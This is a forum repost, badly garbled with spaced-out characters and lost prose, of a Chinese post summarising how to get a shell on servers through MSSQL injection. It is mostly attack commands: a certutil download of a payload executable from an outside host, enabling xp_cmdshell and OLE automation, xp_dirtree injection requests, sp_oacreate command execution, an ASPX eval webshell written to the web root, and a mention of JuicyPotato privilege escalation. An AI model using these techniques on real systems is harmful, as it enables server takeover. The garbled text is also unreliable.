[18249] 2021-01-03_MSSQLGetShell方法总结

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2021-01-03_MSSQLGetShell方法总结 M S S Q L   G e t S h e l l M a c c h i a t o   H A C K   2 0 2 1 - 0 1 - 0 3 0 x 0 1   0 8 0 5 m s s q l 0 5 s y s t e m 0 8 s y s t e m n e t w o r k   s e r v i c e 0 x 0 2   s h e l l c e r t u t i l h t t p s : / / p a y l o a d s . o n l i n e / a r c h i v e r s / 2 0 1 7 - 1 1 - 0 8 / 1 0 8 s q l m a p   - - o s - s h e l l p y t h o n C S 访 s q l m a p C S 线 线 退 s q l m a p w i n d o w s 2 0 0 8 + M S S Q L 2 0 0 8 + i i s 7 w i n d o w s 2 0 0 3 + M S S Q L 2 0 0 5 + i i s 6 c e r t u t i l . e x e   - u r l c a c h e   - s p l i t   - f   h t t p : / / 1 9 2 . 1 6 8 . 1 6 3 . 1 2 8 : 8 0 8 0 / a r t i f a c t . e x e
n e t w o r k   s e r v i c e a d m i n i s t r a t o r n e t w o r k   s e r v i c e 使 j u i c y p o t a t o 0 x 0 3   w e b s h e l l w e b s h e l l c m d x p _ d i r t r e e x p _ s u b d i r s 4 0 4 x p _ c m d s h e l l
w e b . c o n f i g . . < c o n f i g u r a t i o n >         < s y s t e m . w e b >                 < c u s t o m E r r o r s   m o d e = " O f f " / >         < / s y s t e m . w e b > < / c o n f i g u r a t i o n > t y p e 2 0 0 5 2 0 0 8 使 E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ; R E C O N F I G U R E ; E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' ,   1 ; R E C O N F I G U R E ; C : W i n d o w s s y s t e m 3 2 i n e t s r v m e t a b a s e . x m l                 # i i s 6 C : W i n d o w s S y s t e m 3 2 i n e t s r v c o n f i g a p p l i c a t i o n H o s t . c o n f i g               # i i s 7
0 8 c m d h w E F E D 使 F s h e l l s q l m a p F F f o r d i r / s / b   c : i n d e x . a s p x / s             # / b             # d i r   d i r   i n d e x . a s p x i n d e x . a s p x
. . l i n u x s q l m a p l i n u x C t r l + c o s - s h e l l w i n d o w s 退 s q l m a p o s - s h e l l 使 q 退 s q l m a p 退 o s - s h e l l 退 o s - s h e l l s q l m a p   - - t i m e o u t = 1 0 0 m y s q l s q l m a p h t t p d . c o n f w e b s h e l l x p _ d i r t r e e x p _ d i r t r e e f o r   % i   i n   ( c   d   e   f   g   h   i   j   k   l   m   n   o   p   q   r   s   t   u   v   w   x   v   z )   d o   @ ( d i r / s / b   % i : s q l . a s p x )
1 .   2 .   0 1 3 .   1 x p _ d i r t r e e   便 x p _ d i r t r e e   ' c : ' ,   1 ,   1             # h t t p : / / 1 9 2 . 1 6 8 . 1 6 3 . 1 3 3 / s q l . a s p x ? i d = 1 ; c r e a t e   t a b l e   d i r ( s u b d i r e c t o r y   v a r c h a r ( 2 5 5 ) , d e p t h   i n t ,   f i l e e   i n t ) ; i n s e r t   i n t o   d i r ( s u b d i r e c t o r y , d e p t h , f i l e e )   e x e c   x p _ d i r t r e e   ' c : ' , 1 , 1
s q l m a p d i r s q l m a p - - f r e s h - q u e r i e s - - f l u s h - s e s s i o n x p _ s u b d i r s 4 0 4 x p _ s u b d i r s   ' c : '
2 0 0 5 2 0 0 8 i i s 6 i i s 7 i i s C : i n e t p u b c u s t e r r z h - C N z h - T W 0 5 C : W I N D O W S H e l p i i s H e l p c o m m o n 4 0 4 b . h t m   # i i s 6   4 0 4 C : W i n d o w s s y s t e m 3 2 i n e t s r v m e t a b a s e . x m l   # i i s 6   e x e c   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ; R E C O N F I G U R E e x e c   s p _ c o n f i g u r e   ' O l e   A u t o m a t i o n   P r o c e d u r e s ' , 1 ; R E C O N F I G U R E d e c l a r e   @ o   i n t e x e c   s p _ o a c r e a t e   ' s c r i p t i n g . f i l e s y s t e m o b j e c t ' ,   @ o   o u t e x e c   s p _ o a m e t h o d   @ o ,   ' c o p y f i l e ' , n u l l , ' C : W i n d o w s S y s t e m 3 2 i n e t s r v c o n f i g a p p l i c a t i o n H o s t . c o n f i g '   , ' C : i n e t p u b c u s t e r r z h - C N 4 0 4 . h t m ' ;
i i s C : i n e t p u b w w w r o o t w e b s h e l l < > 0 x 0 4   s p _ o a c r e a t e w e b s h e l l x p _ c m d s h e l l 使 x p _ d i r t r e e x p _ s u b d i r s s p _ o a c r e a t e w e b s h e l l s p _ o a c r e a t e c m d _ o u t p u t 0 e c h o   ^ < % @   P a g e   L a n g u a g e = " J s c r i p t " % ^ > ^ < % R e s p o n s e . W r i t e ( e v a l ( R e q u e s t . I t e m [ " z " ] , " u n s a f e " ) ) ; % ^ >   >   C : i n e t p u b w w w r o o t s h e l l . a s p x e x e c   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ; R E C O N F I G U R E e x e c   s p _ c o n f i g u r e   ' O l e   A u t o m a t i o n   P r o c e d u r e s ' , 1 ; R E C O N F I G U R E d e c l a r e   @ o   i n t ; e x e c   s p _ o a c r e a t e   ' w s c r i p t . s h e l l ' , @ o   o u t ; e x e c   s p _ o a m e t h o d   @ o , ' r u n ' , n u l l , ' c m d   / c   m k d i r   c : t e m p ' ; e x e c   s p _ o a m e t h o d   @ o , ' r u n ' , n u l l , ' c m d   / c   " n e t   u s e r "   >   c : t e m p u s e r . t x t ' ; c r e a t e   t a b l e   c m d _ o u t p u t   ( o u t p u t   t e x t ) ; B U L K   I N S E R T   c m d _ o u t p u t   F R O M   ' c : t e m p u s e r . t x t '   W I T H   ( F I E L D T E R M I N A T O R = ' n ' , R O W T E R M I N A T O R   =   ' n n ' )             - -   便 s e l e c t   *   f r o m   c m d _ o u t p u t
v b s S h e l l . A p p l i c a t i o n v b s 使 s c r i p t i n g . f i l e s y s t e m o b j e c t S e t   o b j S h e l l   =   C r e a t e O b j e c t ( " w s c r i p t . s h e l l " ) o b j S h e l l . r u n   " c m d   / c   m k d i r   c : t e m p " o b j S h e l l . r u n   " c m d   / c   n e t   u s e r   >   c : t e m p u s e r . t x t "
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则